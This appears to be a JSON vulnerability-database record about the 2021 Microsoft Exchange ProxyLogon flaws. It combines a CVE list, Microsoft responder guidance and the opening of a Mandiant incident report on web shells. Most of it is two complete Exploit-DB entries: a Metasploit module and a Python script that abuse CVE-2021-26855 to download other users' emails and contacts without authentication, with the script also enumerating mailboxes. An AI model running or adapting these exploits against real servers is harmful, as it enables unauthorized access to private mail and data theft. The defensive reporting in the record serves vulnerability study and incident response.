"CVE-2021-26875", "CVE-2021-26876", "CVE-2021-26877", "CVE-2021-26878", "CVE-2021-26879", "CVE-2021-26880", "CVE-2021-26881", "CVE-2021-26882", "CVE-2021-26884", "CVE-2021-26885", "CVE-2021-26886", "CVE-2021-26887", "CVE-2021-26889", "CVE-2021-26890", "CVE-2021-26891", "CVE-2021-26892", "CVE-2021-26893", "CVE-2021-26894", "CVE-2021-26895", "CVE-2021-26896", "CVE-2021-26897", "CVE-2021-26898", "CVE-2021-26899", "CVE-2021-26900", "CVE-2021-26901", "CVE-2021-26902", "CVE-2021-27047", "CVE-2021-27048", "CVE-2021-27049", "CVE-2021-27050", "CVE-2021-27051", "CVE-2021-27052", "CVE-2021-27053", "CVE-2021-27054", "CVE-2021-27055", "CVE-2021-27056", "CVE-2021-27057", "CVE-2021-27058", "CVE-2021-27059", "CVE-2021-27060", "CVE-2021-27061", "CVE-2021-27062", "CVE-2021-27063", "CVE-2021-27065", "CVE-2021-27066", "CVE-2021-27070", "CVE-2021-27074", "CVE-2021-27075", "CVE-2021-27076", "CVE-2021-27077", "CVE-2021-27078", "CVE-2021-27080", "CVE-2021-27081", "CVE-2021-27082", "CVE-2021-27083", "CVE-2021-27084", "CVE-2021-27085"], "modified": "2021-03-09T22:13:03", "id": "RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53", "href": "https://blog.rapid7.com/2021/03/09/patch-tuesday-march-2021/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2022-05-13T17:37:55", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-21T00:00:00", "type": "exploitdb", "title": "Microsoft Exchange 2019 - Unauthenticated Email Download (Metasploit)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": 
false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2021-26855", "CVE-2021-26855", "CVE-2021-27065"], "modified": "2021-05-21T00:00:00", "id": "EDB-ID:49895", "href": "https://www.exploit-db.com/exploits/49895", "sourceData": "# Exploit Title: Microsoft Exchange 2019 - Unauthenticated Email Download (Metasploit)\r\n# Date: 2021-03-02\r\n# Exploit Author: RAMELLA S\u00e9bastien\r\n# Vendor Homepage: https://microsoft.com\r\n# Version: This vulnerability affects (Exchange 2013 Versions < 15.00.1497.012,\r\n Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009,\r\n Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010).\r\n# Tested on: Microsoft Windows 2012 R2 - Exchange 2016\r\n\r\n##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\n# begin auxiliary class\r\nclass MetasploitModule < Msf::Auxiliary\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'Microsoft Exchange ProxyLogon Collector',\r\n 'Description' => %q{\r\n This module scan for a vulnerability on Microsoft Exchange Server that\r\n allows an attacker bypassing the authentication and impersonating as the\r\n admin (CVE-2021-26855).\r\n\r\n By chaining this bug with another post-auth arbitrary-file-write\r\n vulnerability to get code execution (CVE-2021-27065).\r\n\r\n As a result, an unauthenticated attacker can execute arbitrary commands on\r\n Microsoft Exchange Server.\r\n\r\n This vulnerability affects (Exchange 
2013 Versions < 15.00.1497.012,\r\n Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009,\r\n Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010).\r\n\r\n All components are vulnerable by default.\r\n },\r\n 'Author' => [\r\n 'mekhalleh (RAMELLA S\u00e9bastien)' # Module author (Zeop Entreprise)\r\n ],\r\n 'References' => [\r\n ['CVE', '2021-26855'],\r\n ['LOGO', 'https://proxylogon.com/images/logo.jpg'],\r\n ['URL', 'https://proxylogon.com/'],\r\n ['URL', 'https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse'],\r\n ['URL', 'http://aka.ms/exchangevulns']\r\n ],\r\n 'DisclosureDate' => '2021-03-02',\r\n 'License' => MSF_LICENSE,\r\n 'DefaultOptions' => {\r\n 'RPORT' => 443,\r\n 'SSL' => true\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['ProxyLogon']\r\n }\r\n )\r\n )\r\n\r\n register_options([\r\n OptString.new('EMAIL', [true, 'The email address of the mailbox to dump']),\r\n OptString.new('FOLDER', [true, 'The mailbox folder to dump', 'inbox']),\r\n OptString.new('SERVER_NAME', [true, 'The internal hostname of the backend Exchange server the SSRF is routed to'])\r\n ])\r\n\r\n register_advanced_options([\r\n OptInt.new('MaxEntries', [false, 'Override the maximum number of objects to dump', 512])\r\n ])\r\n end\r\n\r\n XMLNS = { 't' => 'http://schemas.microsoft.com/exchange/services/2006/types' }.freeze\r\n\r\n def grab_contacts\r\n response = send_xml(soap_findcontacts)\r\n xml = Nokogiri::XML.parse(response.body)\r\n\r\n data = xml.xpath('//t:Contact', XMLNS)\r\n if data.empty?\r\n print_status(' - the user has no contacts')\r\n else\r\n write_loot(data.to_s)\r\n end\r\n end\r\n\r\n def grab_emails(total_count)\r\n # get the list of items in the target folder.\r\n response = send_xml(soap_maillist(total_count))\r\n xml = Nokogiri::XML.parse(response.body)\r\n\r\n # iterate over the items and download each one as MIME.\r\n xml.xpath('//t:ItemId', XMLNS).each do |item|\r\n print_status(\" - download item: 
#{item.values[1]}\")\r\n response = send_xml(soap_download(item.values[0], item.values[1]))\r\n xml = Nokogiri::XML.parse(response.body)\r\n\r\n message = xml.at_xpath('//t:MimeContent', XMLNS).content\r\n write_loot(Rex::Text.decode_base64(message))\r\n end\r\n end\r\n\r\n def send_xml(data)\r\n uri = normalize_uri('ecp', 'temp.js')\r\n\r\n received = send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => uri,\r\n 'cookie' => \"X-BEResource=#{datastore['SERVER_NAME']}/EWS/Exchange.asmx?a=~3;\",\r\n 'ctype' => 'text/xml; charset=utf-8',\r\n 'data' => data\r\n )\r\n fail_with(Failure::Unknown, 'Server did not respond in an expected way') unless received\r\n\r\n received\r\n end\r\n\r\n def soap_download(id, change_key)\r\n <<~SOAP\r\n <?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n <soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\r\n xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\"\r\n xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\"\r\n xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\r\n <soap:Body>\r\n <m:GetItem>\r\n <m:ItemShape>\r\n <t:BaseShape>IdOnly</t:BaseShape>\r\n <t:IncludeMimeContent>true</t:IncludeMimeContent>\r\n </m:ItemShape>\r\n <m:ItemIds>\r\n <t:ItemId Id=\"#{id}\" ChangeKey=\"#{change_key}\" />\r\n </m:ItemIds>\r\n </m:GetItem>\r\n </soap:Body>\r\n </soap:Envelope>\r\n SOAP\r\n end\r\n\r\n def soap_findcontacts\r\n <<~SOAP\r\n <?xml version='1.0' encoding='utf-8'?>\r\n <soap:Envelope\r\n xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'\r\n xmlns:t='http://schemas.microsoft.com/exchange/services/2006/types'\r\n xmlns:m='http://schemas.microsoft.com/exchange/services/2006/messages'\r\n xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'>\r\n <soap:Body>\r\n <m:FindItem Traversal='Shallow'>\r\n <m:ItemShape>\r\n <t:BaseShape>AllProperties</t:BaseShape>\r\n </m:ItemShape>\r\n <m:IndexedPageItemView MaxEntriesReturned=\"#{datastore['MaxEntries']}\" Offset=\"0\" 
BasePoint=\"Beginning\" />\r\n <m:ParentFolderIds>\r\n <t:DistinguishedFolderId Id='contacts'>\r\n <t:Mailbox>\r\n <t:EmailAddress>#{datastore['EMAIL']}</t:EmailAddress>\r\n </t:Mailbox>\r\n </t:DistinguishedFolderId>\r\n </m:ParentFolderIds>\r\n </m:FindItem>\r\n </soap:Body>\r\n </soap:Envelope>\r\n SOAP\r\n end\r\n\r\n def soap_mailnum\r\n <<~SOAP\r\n <?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n <soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\r\n xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\"\r\n xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\"\r\n xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\r\n <soap:Body>\r\n <m:GetFolder>\r\n <m:FolderShape>\r\n <t:BaseShape>Default</t:BaseShape>\r\n </m:FolderShape>\r\n <m:FolderIds>\r\n <t:DistinguishedFolderId Id=\"#{datastore['FOLDER']}\">\r\n <t:Mailbox>\r\n <t:EmailAddress>#{datastore['EMAIL']}</t:EmailAddress>\r\n </t:Mailbox>\r\n </t:DistinguishedFolderId>\r\n </m:FolderIds>\r\n </m:GetFolder>\r\n </soap:Body>\r\n </soap:Envelope>\r\n SOAP\r\n end\r\n\r\n def soap_maillist(max_entries)\r\n <<~SOAP\r\n <?xml version='1.0' encoding='utf-8'?>\r\n <soap:Envelope\r\n xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'\r\n xmlns:t='http://schemas.microsoft.com/exchange/services/2006/types'\r\n xmlns:m='http://schemas.microsoft.com/exchange/services/2006/messages'\r\n xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'>\r\n <soap:Body>\r\n <m:FindItem Traversal='Shallow'>\r\n <m:ItemShape>\r\n <t:BaseShape>AllProperties</t:BaseShape>\r\n </m:ItemShape>\r\n <m:IndexedPageItemView MaxEntriesReturned=\"#{max_entries}\" Offset=\"0\" BasePoint=\"Beginning\" />\r\n <m:ParentFolderIds>\r\n <t:DistinguishedFolderId Id='#{datastore['FOLDER']}'>\r\n <t:Mailbox>\r\n <t:EmailAddress>#{datastore['EMAIL']}</t:EmailAddress>\r\n </t:Mailbox>\r\n </t:DistinguishedFolderId>\r\n </m:ParentFolderIds>\r\n </m:FindItem>\r\n </soap:Body>\r\n 
</soap:Envelope>\r\n SOAP\r\n end\r\n\r\n def write_loot(data)\r\n loot_path = store_loot('', 'text/plain', datastore['RHOSTS'], data, '', '')\r\n print_good(\" - file saved to #{loot_path}\")\r\n end\r\n\r\n def run\r\n # get the informations about the targeted user account.\r\n response = send_xml(soap_mailnum)\r\n if response.body =~ /Success/\r\n print_status('Connection to the server is successful')\r\n print_status(\" - selected account: #{datastore['EMAIL']}\\n\")\r\n\r\n # grab contacts.\r\n print_status('Attempt to dump contacts list for this user')\r\n grab_contacts\r\n\r\n print_line\r\n\r\n # grab emails.\r\n print_status('Attempt to dump emails for this user')\r\n xml = Nokogiri::XML.parse(response.body)\r\n folder_id = xml.at_xpath('//t:FolderId', XMLNS).values\r\n print_status(\" - selected folder: #{datastore['FOLDER']} (#{folder_id[0]})\")\r\n\r\n total_count = xml.at_xpath('//t:TotalCount', XMLNS).content\r\n print_status(\" - number of email found: #{total_count}\")\r\n\r\n if total_count.to_i > datastore['MaxEntries']\r\n print_warning(\" - number of email recaluled due to max entries: #{datastore['MaxEntries']}\")\r\n total_count = datastore['MaxEntries'].to_s\r\n end\r\n grab_emails(total_count)\r\n end\r\n end\r\n\r\nend", "sourceHref": "https://www.exploit-db.com/download/49895", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-13T17:38:01", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-18T00:00:00", "type": "exploitdb", "title": "Microsoft Exchange 2019 - Unauthenticated Email Download", 
"bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2021-26855", "CVE-2021-26855"], "modified": "2021-05-18T00:00:00", "id": "EDB-ID:49879", "href": "https://www.exploit-db.com/exploits/49879", "sourceData": "# Exploit Title: Microsoft Exchange 2019 - Unauthenticated Email Download\r\n# Date: 03-11-2021\r\n# Exploit Author: Gonzalo Villegas a.k.a Cl34r\r\n# Vendor Homepage: https://www.microsoft.com/\r\n# Version: OWA Exchange 2013 - 2019\r\n# Tested on: OWA 2016\r\n# CVE : CVE-2021-26855\r\n# Details: checking users mailboxes and automated downloads of emails\r\n\r\nimport requests\r\nimport argparse\r\nimport time\r\n\r\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\r\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\r\n\r\n__proxies__ = {\"http\": \"http://127.0.0.1:8080\",\r\n \"https\": \"https://127.0.0.1:8080\"} # for debug on proxy\r\n\r\n\r\n# needs to specifies mailbox, will return folder Id if account exists\r\npayload_get_folder_id = \"\"\"<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n <soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" \r\n xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\" \r\n xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" \r\n xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\r\n <soap:Body>\r\n <m:GetFolder>\r\n <m:FolderShape>\r\n <t:BaseShape>AllProperties</t:BaseShape>\r\n </m:FolderShape>\r\n <m:FolderIds>\r\n <t:DistinguishedFolderId 
Id=\"inbox\">\r\n <t:Mailbox>\r\n <t:EmailAddress>{}</t:EmailAddress>\r\n </t:Mailbox>\r\n </t:DistinguishedFolderId>\r\n </m:FolderIds>\r\n </m:GetFolder>\r\n </soap:Body>\r\n </soap:Envelope>\r\n\r\n\"\"\"\r\n# needs to specifies Folder Id and ChangeKey, will return a list of messages Ids (emails)\r\npayload_get_items_id_folder = \"\"\"<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n <soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" \r\n xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\" \r\n xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" \r\n xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\r\n <soap:Body>\r\n <m:FindItem Traversal=\"Shallow\">\r\n <m:ItemShape>\r\n <BaseShape>AllProperties</BaseShape></m:ItemShape>\r\n <SortOrder/>\r\n <m:ParentFolderIds>\r\n <t:FolderId Id=\"{}\" ChangeKey=\"{}\"/>\r\n </m:ParentFolderIds>\r\n <QueryString/>\r\n </m:FindItem>\r\n </soap:Body>\r\n</soap:Envelope>\r\n\"\"\"\r\n\r\n# needs to specifies Id (message Id) and ChangeKey (of message too), will return an email from mailbox\r\npayload_get_mail = \"\"\"<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n <soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" \r\n xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\" \r\n xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" \r\n xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\r\n <soap:Body>\r\n <GetItem xmlns=\"http://schemas.microsoft.com/exchange/services/2006/messages\" \r\n xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" Traversal=\"Shallow\">\r\n <ItemShape>\r\n <t:BaseShape>Default</t:BaseShape>\r\n </ItemShape>\r\n <ItemIds>\r\n <t:ItemId Id=\"{}\" ChangeKey=\"{}\"/>\r\n </ItemIds>\r\n </GetItem>\r\n </soap:Body>\r\n </soap:Envelope>\r\n\"\"\"\r\n\r\n\r\ndef getFQDN(url):\r\n print(\"[*] Getting FQDN from headers\")\r\n rs = requests.post(url + \"/owa/auth.owa\", 
verify=False, data=\"evildata\")\r\n if \"X-FEServer\" in rs.headers:\r\n return rs.headers[\"X-FEServer\"]\r\n else:\r\n print(\"[-] Can't get FQDN \")\r\n exit(0)\r\n\r\n\r\ndef extractEmail(url, uri, user, fqdn, content_folderid, path):\r\n headers = {\"Cookie\": \"X-BEResource={}/EWS/Exchange.asmx?a=~1942062522\".format(fqdn),\r\n \"Content-Type\": \"text/xml\",\r\n \"User-Agent\": \"Mozilla pwner\"}\r\n from xml.etree import ElementTree as ET\r\n dom = ET.fromstring(content_folderid)\r\n for p in dom.findall('.//{http://schemas.microsoft.com/exchange/services/2006/types}Folder'):\r\n id_folder = p[0].attrib.get(\"Id\")\r\n change_key_folder = p[0].attrib.get(\"ChangeKey\")\r\n data = payload_get_items_id_folder.format(id_folder, change_key_folder)\r\n random_uris = [\"auth.js\", \"favicon.ico\", \"ssq.js\", \"ey37sj.js\"]\r\n rs = requests.post(url + uri, data=data, headers=headers, verify=False)\r\n if \"ErrorAccessDenied\" in rs.text:\r\n print(\"[*] Denied ;(.. retrying\")\r\n t_uri = uri.split(\"/\")[-1]\r\n for ru in random_uris:\r\n print(\"[*] Retrying with {}\".format(uri.replace(t_uri, ru)))\r\n rs = requests.post(url + uri.replace(t_uri, ru), data=data, headers=headers, verify=False)\r\n if \"NoError\" in rs.text:\r\n print(\"[+] data found, dowloading email\")\r\n break\r\n print(\"[+]Getting mails...\")\r\n dom_messages = ET.fromstring(rs.text)\r\n messages = dom_messages.find('.//{http://schemas.microsoft.com/exchange/services/2006/types}Items')\r\n for m in messages:\r\n id_message = m[0].attrib.get(\"Id\")\r\n change_key_message = m[0].attrib.get(\"ChangeKey\")\r\n data = payload_get_mail.format(id_message, change_key_message)\r\n random_uris = [\"auth.js\", \"favicon.ico\", \"ssq.js\", \"ey37sj.js\"]\r\n rs = requests.post(url + uri, data=data, headers=headers, verify=False)\r\n if \"ErrorAccessDenied\" in rs.text:\r\n print(\"[*] Denied ;(.. 
retrying\")\r\n t_uri = uri.split(\"/\")[-1]\r\n for ru in random_uris:\r\n print(\"[*] Retrying with {}\".format(uri.replace(t_uri, ru)))\r\n rs = requests.post(url + uri.replace(t_uri, ru), data=data, headers=headers, verify=False)\r\n if \"NoError\" in rs.text:\r\n print(\"[+] data found, downloading email\")\r\n break\r\n\r\n try:\r\n f = open(path + \"/\" + user.replace(\"@\", \"_\").replace(\".\", \"_\")+\"_\"+change_key_message.replace(\"/\", \"\").replace(\"\\\\\", \"\")+\".xml\", 'w+')\r\n f.write(rs.text)\r\n f.close()\r\n except Exception as e:\r\n print(\"[!] Can't write .xml file to path (email): \", e)\r\n\r\n\r\ndef checkURI(url, fqdn):\r\n headers = {\"Cookie\": \"X-BEResource={}/EWS/Exchange.asmx?a=~1942062522\".format(fqdn),\r\n \"Content-Type\": \"text/xml\",\r\n \"User-Agent\": \"Mozilla hehe\"}\r\n arr_uri = [\"//ecp/xxx.js\", \"/ecp/favicon.ico\", \"/ecp/auth.js\"]\r\n for uri in arr_uri:\r\n rs = requests.post(url + uri, verify=False, data=payload_get_folder_id.format(\"thisisnotanvalidmail@pwn.local\"),\r\n headers=headers)\r\n #print(rs.content)\r\n if rs.status_code == 200 and \"MessageText\" in rs.text:\r\n print(\"[+] Valid URI:\", uri)\r\n calculated_domain = rs.headers[\"X-CalculatedBETarget\"].split(\".\")\r\n if calculated_domain[-2] in (\"com\", \"gov\", \"gob\", \"edu\", \"org\"):\r\n calculated_domain = calculated_domain[-3] + \".\" + calculated_domain[-2] + \".\" + calculated_domain[-1]\r\n else:\r\n calculated_domain = calculated_domain[-2] + \".\" + calculated_domain[-1]\r\n return uri, calculated_domain\r\n #time.sleep(1)\r\n print(\"[-] No valid URI found ;(\")\r\n exit(0)\r\n\r\n\r\ndef checkEmailBoxes(url, uri, user, fqdn, path):\r\n headers = {\"Cookie\": \"X-BEResource={}/EWS/Exchange.asmx?a=~1942062522\".format(fqdn),\r\n \"Content-Type\": \"text/xml\",\r\n \"User-Agent\": \"Mozilla hehe\"}\r\n rs = requests.post(url + uri, verify=False, data=payload_get_folder_id.format(user),\r\n headers=headers)\r\n #time.sleep(1)\r\n 
#print(rs.content)\r\n if \"ResponseCode\" in rs.text and \"ErrorAccessDenied\" in rs.text:\r\n print(\"[*] Valid Email: {} ...but not authenticated ;( maybe not vulnerable\".format(user))\r\n if \"ResponseCode\" in rs.text and \"NoError\" in rs.text:\r\n print(\"[+] Valid Email Found!: {}\".format(user))\r\n extractEmail(url, uri, user, fqdn, rs.text, path)\r\n if \"ResponseCode\" in rs.text and \"ErrorNonExistentMailbox\" in rs.text:\r\n print(\"[-] Not Valid Email: {}\".format(user))\r\n\r\n\r\ndef main():\r\n __URL__ = None\r\n __FQDN__ = None\r\n __mailbox_domain__ = None\r\n __path__ = None\r\n print(\"[***** OhhWAA *****]\")\r\n parser = argparse.ArgumentParser(usage=\"Basic usage python %(prog)s -u <url> -l <users.txt> -p <path>\")\r\n parser.add_argument('-u', \"--url\", help=\"Url, provide schema and not final / (eg https://example.org)\", required=True)\r\n parser.add_argument('-l', \"--list\", help=\"Users mailbox list\", required=True)\r\n parser.add_argument(\"-p\", \"--path\", help=\"Path to write emails in xml format\", required=True)\r\n parser.add_argument('-f', \"--fqdn\", help=\"FQDN\", required=False, default=None)\r\n parser.add_argument(\"-d\", \"--domain\", help=\"Domain to check mailboxes (eg if .local dont work)\", required=False, default=None)\r\n args = parser.parse_args()\r\n __URL__ = args.url\r\n __FQDN__ = args.fqdn\r\n __mailbox_domain__ = args.domain\r\n __list_users__ = args.list\r\n __valid_users__ = []\r\n __path__ = args.path\r\n if not __FQDN__:\r\n __FQDN__ = getFQDN(__URL__)\r\n print(\"[+] Got FQDN:\", __FQDN__)\r\n\r\n valid_uri, calculated_domain = checkURI(__URL__, __FQDN__)\r\n\r\n if not __mailbox_domain__:\r\n __mailbox_domain__ = calculated_domain\r\n\r\n list_users = open(__list_users__, \"r\")\r\n for user in list_users:\r\n checkEmailBoxes(__URL__, valid_uri, user.strip()+\"@\"+__mailbox_domain__, __FQDN__, __path__)\r\n\r\n print(\"[!!!] 
FINISHED OhhWAA\")\r\n\r\n\r\nif __name__ == '__main__':\r\n main()", "sourceHref": "https://www.exploit-db.com/download/49879", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "msrc": [{"lastseen": "2021-03-16T18:53:05", "description": "This guidance will help customers address threats taking advantage of the recently disclosed Microsoft Exchange Server on-premises vulnerabilities CVE-2021-26855, CVE-2021-26858, CVE-2021-26857, and CVE-2021-27065. Microsoft will continue to monitor these threats and provide updated tools and investigation guidance to help organizations defend against, identify, and remediate associated attacks.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-16T18:44:28", "type": "msrc", "title": "Guidance for responders: Investigating and remediating on-premises Exchange Server vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-16T18:44:28", "id": "MSRC:ED939F90BDE8D7A32031A750388B03C9", "href": 
"https://msrc-blog.microsoft.com/2021/03/16/guidance-for-responders-investigating-and-remediating-on-premises-exchange-server-vulnerabilities/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "fireeye": [{"lastseen": "2021-10-11T12:35:13", "description": "Beginning in January 2021, Mandiant Managed Defense observed multiple instances of abuse of Microsoft Exchange Server within at least one client environment. The observed activity included creation of web shells for persistent access, remote code execution, and reconnaissance for endpoint security solutions. Our investigation revealed that the files created on the Exchange servers were owned by the user NT AUTHORITY\\SYSTEM, a privileged local account on the Windows operating system. Furthermore, the process that created the web shell was UMWorkerProcess.exe, the process responsible for Exchange Server\u2019s Unified Messaging Service. In subsequent investigations, we observed malicious files created by w3wp.exe, the process responsible for the Exchange Server web front-end.\n\nIn response to this activity, we built threat hunting campaigns designed to identify additional Exchange Server abuse. We also utilized this data to build higher-fidelity detections of web server process chains. On March 2, 2021, Microsoft released a [blog post](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) that detailed multiple zero-day vulnerabilities used to attack on-premises versions of Microsoft Exchange Server. 
Microsoft also issued emergency Exchange Server updates for the following vulnerabilities:\n\n| **CVE** | **Risk Rating** | **Access Vector** | **Exploitability** | **Ease of Attack** | **Mandiant Intel** |\n|---|---|---|---|---|---|\n| **CVE-2021-26855** | Critical | Network | Functional | Easy | [Link](<https://intelligence.fireeye.com/reports/21-00004941>) |\n| **CVE-2021-26857** | Medium | Network | Functional | Easy | [Link](<https://intelligence.fireeye.com/reports/21-00004938>) |\n| **CVE-2021-26858** | Medium | Network | Functional | Easy | [Link](<https://intelligence.fireeye.com/reports/21-00004944>) |\n| **CVE-2021-27065** | Medium | Network | Functional | Easy | [Link](<https://intelligence.fireeye.com/reports/21-00004939>) |\n\nTable 1: List of March 2021 Microsoft Exchange CVEs and FireEye Intel Summaries\n\nThe activity reported by Microsoft aligns with our observations. **FireEye currently tracks this activity in three clusters, UNC2639, UNC2640, and UNC2643. We anticipate additional clusters as we respond to intrusions.** We recommend following Microsoft\u2019s guidance and patching Exchange Server immediately to mitigate this activity.\n\nBased on our telemetry, we have identified an array of affected victims including US-based retailers, local governments, a university, and an engineering firm. Related activity may also include a Southeast Asian government and Central Asian telecom. 
[Microsoft reported](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) the exploitation occurred together and is linked to a single group of actors tracked as \u201cHAFNIUM\u201d, a group that has previously targeted the US-based defense companies, law firms, infectious disease researchers, and think tanks.\n\nIn this blog post, we will detail our observations on the active investigations we are currently performing. As our experience with and knowledge of this threat actor grows, we will update this post or release new technical details as appropriate. For our Managed Defense Customers, we have launched a Community Protection Event that will provide frequent updates on this threat actor and activity.\n\nWe will be discussing these attacks more in an [upcoming webinar on Mar. 17, 2021](<https://www.brighttalk.com/webcast/7451/475010?utm_source=FireEye&utm_medium=brighttalk&utm_campaign=475010>).\n\n#### From Exploit to Web Shell\n\nBeginning in January 2021, Mandiant Managed Defense observed the creation of web shells on one Microsoft Exchange server file system within a customer\u2019s environment. The web shell, named help.aspx (MD5: 4b3039cf227c611c45d2242d1228a121), contained code to identify the presence of (1) FireEye xAgent, (2) CarbonBlack, or (3) CrowdStrike Falcon endpoint products and write the output of discovery. Figure 1 provides a snippet of the web shell\u2019s code.\n\n\n\n \nFigure 1: Snippet of the web shell help.aspx, crafted to identify the presence of endpoint security software on a victim system\n\nThe web shell was written to the system by the UMWorkerProcess.exe process, which is associated with Microsoft Exchange Server\u2019s Unified Messaging service. This activity suggested exploitation of CVE-2021-26858.\n\nApproximately twenty days later, the attacker placed another web shell on a separate Microsoft Exchange Server. 
